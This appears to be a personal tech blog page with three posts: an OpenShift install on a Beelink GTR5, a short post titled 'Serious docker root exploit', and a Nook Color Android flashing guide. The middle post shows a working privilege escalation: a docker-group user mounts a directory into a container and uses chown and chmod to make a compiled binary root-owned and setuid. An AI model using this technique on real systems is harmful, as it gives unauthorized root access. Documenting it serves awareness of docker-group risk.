Installing single-node OpenShift (SNO) on a bee-link GTR5

After working on the HP Chromebox G1 – I discovered that a single 32 GB DDR3 SODIMM was going to cost 3 times what the Chromebox itself cost me to begin with.  It quickly became evident my openshift experiment was going to be limited using the Chromebox, so I decided to try on another PC I had available, this was a bee-link GTR5.  In addition to the internal SSD, I also added a 1 TB NVME drive.

The chromebox G1’s might be possible to use as a microshift cluster but still waiting on the parts to really determine if that’s possible.

The GTR5 was previously used as a desktop machine running the i3 respin of Fedora.  First step was to back up everything and then off to the races with openshift.

I started out following this guide.

Installation followed pretty closely, I’m only going to note any special steps I did on my side.

I’m running a pretty simple consumer grade router, but it let me configured the DHCP hostname – I set the GTR5 as “hive.geolaw.loc” and used that in the cluster details.

Cluster Name: hive
Base Domain: geolaw.loc

Copied my ssh .pub and then generated the discovery iso

DNS entries : like I said, I’ve got a cheap consumer class router, does not support adding DNS entries.
So on the machines I plan on accessing the web GUI or ‘oc’ –  I plan on just using the following /etc/hosts entries :

$ grep hive /etc/hosts api.hive.geolaw.loc *.apps.hive.geolaw.loc api-int.hive.geolaw.loc

Booting the discovery.iso

I had an existing Ventoy USB drive that I first tried just dropping the iso file into the Ventoy partition – this did not boot properly for me and went to an emergency shell.  I then just used dd to write the discovery iso to the thumb drive:
$ sudo dd if=discovery_image_hive.iso of=/dev/sdb bs=1024

Once this finished I rebooted the GTR5 and from the UEFI level selected the USB to boot from.

After booting, the agent.service was failing due to it being unable to pull from the registry:

Jun 22 14:26:26 hive podman[17680]: Error: initializing source docker:// unable to retrieve auth token: invalid username/password: unauthorized: Please login to the Red Hat Registry using your Customer Portal credentials. Further instructions can be found here:
Jun 22 14:26:29 hive podman[17749]: Trying to pull…


To fix this I ssh’d into the openshift installer, su’d to root, and then logged into to  Once I logged in, I restarted the agent.service and away it went!


$ ssh core@hive
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
This is a host being installed by the OpenShift Assisted Installer.
It will be installed from scratch during the installation.

The primary service is agent.service. To watch its status, run:
sudo journalctl -u agent.service

To view the agent log, run:
sudo journalctl TAG=agent
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
Last login: Thu Jun 22 14:26:22 2023 from
[core@hive ~]$ sudo su –
Last login: Thu Jun 22 14:17:22 UTC 2023 on pts/0
[root@hive ~]# podman login
Authenticating with existing credentials for
Existing credentials are invalid, please enter valid username and password
Username (|uhc-pool-81ec5a21-635b-4c43-8409-63e45c46ad51):
Login Succeeded!
[root@hive ~]# systemctl restart agent

The discovered host eventually popped up in the assisted installer and I was able to select my network and continue the install.

The host rebooted several times along the way as it was processing the install.

Watching the console I could see where it was pulling down the containers and starting them.

but again getting the registry errors and the containers going into a ImagePullBackOff state

Jun 22 15:42:07 hive kubenswrapper[2978]: E0622 15:42:07.423504 2978 pod_workers.go:965] “Error syncing pod, skipping” err=”failed to \”StartContainer\” for \”registry-server\” with ImagePullBackOff: \”Back-off pulling image \\\”\\\”\”” pod=”openshift-marketplace/certified-operators-bb2nx” podUID=0f76c0fa-cb11-436f-9e7e-77357117b313


I tried doing the podman register again, as root, as core, as containers .. no bueno 🙁


Oh well, good first test, will have to retry later.

Serious docker root exploit

I was amazed at how easy this was.  I found a couple different websites that lead me to this, giving credit where credit is due



So putting 1 and 2 together.  I have my docker install running as the “docker” user, so no “sudo” required.  All I did (as docker) is :

1. Create the following snippet of C code shutdown_suid.c :
docker $> vi shutdown_suid.c
include <stdlib.h>
include <unistd.h>

int main() {
system(“/sbin/shutdown -h now”); /* change this to the actual location of shutdown */
return 0;

2. Compile it :docker $> gcc -o shutdown_setuid shutdown_setuid.c

3. Exploit docker to mount the current directory and set rebuild_setuid to be owned as root and turn on the setuid permissions :
docker $> docker run -v $PWD:/stuff -t dockerdev/rhel /bin/bash -c ‘chown root.root /stuff/reboot_setuid && chmod a+s /stuff/reboot_setuid’

4. docker $> ls -la shutdown_setuid
-rwsrwsr-x. 1 root root 6623 May 29 11:54 shutdown_setuid

Turning your Nook Color into an Android 4.1 Jellybean tablet

Converting a nook color into a Jellybean 4.1 tablet.  I think it took me longer to write this up than to actually do it 🙂

Done on Linux Mint – bash commands are showing in bold italics

  1. grab a microsd card – they say that Sandisk brand, at least Class 4 works best.
    I have done this with both a 4GB and 8GB card, both worked, you can go larger – I am not sure if there is a max capacity supported by Android or the nook
  2. Download the boot image –
    Look for the attachment to the main article –
    I get a md5sum of : a2f15e48a5bb858db8ec02ccedbcb5b7
  3. glaw@mint:~$ mkdir nook
  4. glaw@mint:~/nook$ wget  
  5. glaw@mint:~/nook$ wget
  6. glaw@mint:~/nook$ md5sum cm*.zip gapp*.zip
  7. glaw@mint:~/nook$ unzip
      inflating: generic-sdcard-v1.3-CM7-9-10-larger-Rev5.img
  8. glaw@mint:~/nook$ sudo dd if=generic-sdcard-v1.3-CM7-9-10-larger-Rev5.img of=/dev/sde bs=1M
    [sudo] password for glaw: 
    298+1 records in
    298+1 records out
    312560640 bytes (313 MB) copied, 69.6386 s, 4.5 MB/s
  9. eject the card and reinsert – I just disconnected my card reader and reconnected
  10. Mount the cd card – this is a 300 mb vfat parition

    glaw@mint:~/nook$ sudo mount /dev/sde1 /mnt
    glaw@mint:~/nook$ls -la /mnt

    total 8112
    drwxr-xr-x  2 root root    4096 Dec 31  1969 .
    drwxr-xr-x 27 root root    4096 Jan 18 00:13 ..
    -rwxr-xr-x  1 root root   14504 Feb 15  2011 MLO
    -rwxr-xr-x  1 root root  289328 May 29  2011 u-boot.bin
    -rwxr-xr-x  1 root root 2756116 May 14  2011 uImage
    -rwxr-xr-x  1 root root 5234466 Oct 17 19:41 uRamdisk
  11. glaw@mint:~/nook$ sudo cp cm*.zip gapp*.zip /mnt
    glaw@mint:~/nook$ls -la /mnt

    total 253116
    drwxr-xr-x  2 root root      4096 Dec 31  1969 .
    drwxr-xr-x 27 root root      4096 Jan 18 00:13 ..
    -rwxr-xr-x  1 root root 158172246 Jan 19 10:14
    -rwxr-xr-x  1 root root  92706064 Jan 19 10:15
    -rwxr-xr-x  1 root root     14504 Feb 15  2011 MLO
    -rwxr-xr-x  1 root root    289328 May 29  2011 u-boot.bin
    -rwxr-xr-x  1 root root   2756116 May 14  2011 uImage
    -rwxr-xr-x  1 root root   5234466 Oct 17 19:41 uRamdisk
  12. glaw@mint:~/nook$ sudo umount /mnt
  13. eject the card,
  14. With the nook powered off, insert into the nook’s microsd slot and then power on.  Sit back and relax for 4 and a half minutes :
  15. repower on the nook and welcome to Android Jellybean.